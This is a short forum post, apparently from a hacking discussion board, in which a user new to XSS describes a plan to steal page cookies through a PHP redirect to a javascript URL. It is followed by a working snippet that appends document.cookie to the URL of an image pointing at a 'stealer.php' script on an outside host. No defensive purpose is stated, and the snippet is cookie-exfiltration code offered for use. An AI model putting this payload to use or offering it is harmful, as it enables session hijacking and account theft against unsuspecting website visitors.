Dillxn wrote:Alright, before I go on a wild-goose-chase type trial-and-error session here, tell me if you think this would work (bearing in mind that XSS and most of "hacking" in general is all new to me).
I'll have the PHP page redirect the header location to a javascript url that extracts the page cookie and then opens another window with a page located on my server. The script will pass the extracted cookie to the page via querystring (and saves the data) and then the new window closes itself.
The concern I have here, is whether or not the redirect to the javascript url will occur within the image/php page or the actual root page.
So, what do you think?
And by the way, I do very much appreciate the help thus far and hopefully continued.
<script type="text/javascript">
document.getElementById('image').src='http://www.google.com/stealer.php?action=GO&cookies='+document.cookie;
</script>
<image src="http://www.google.com/stealer.php?action=waitForIt" id="image" />
Users browsing this forum: No registered users and 0 guests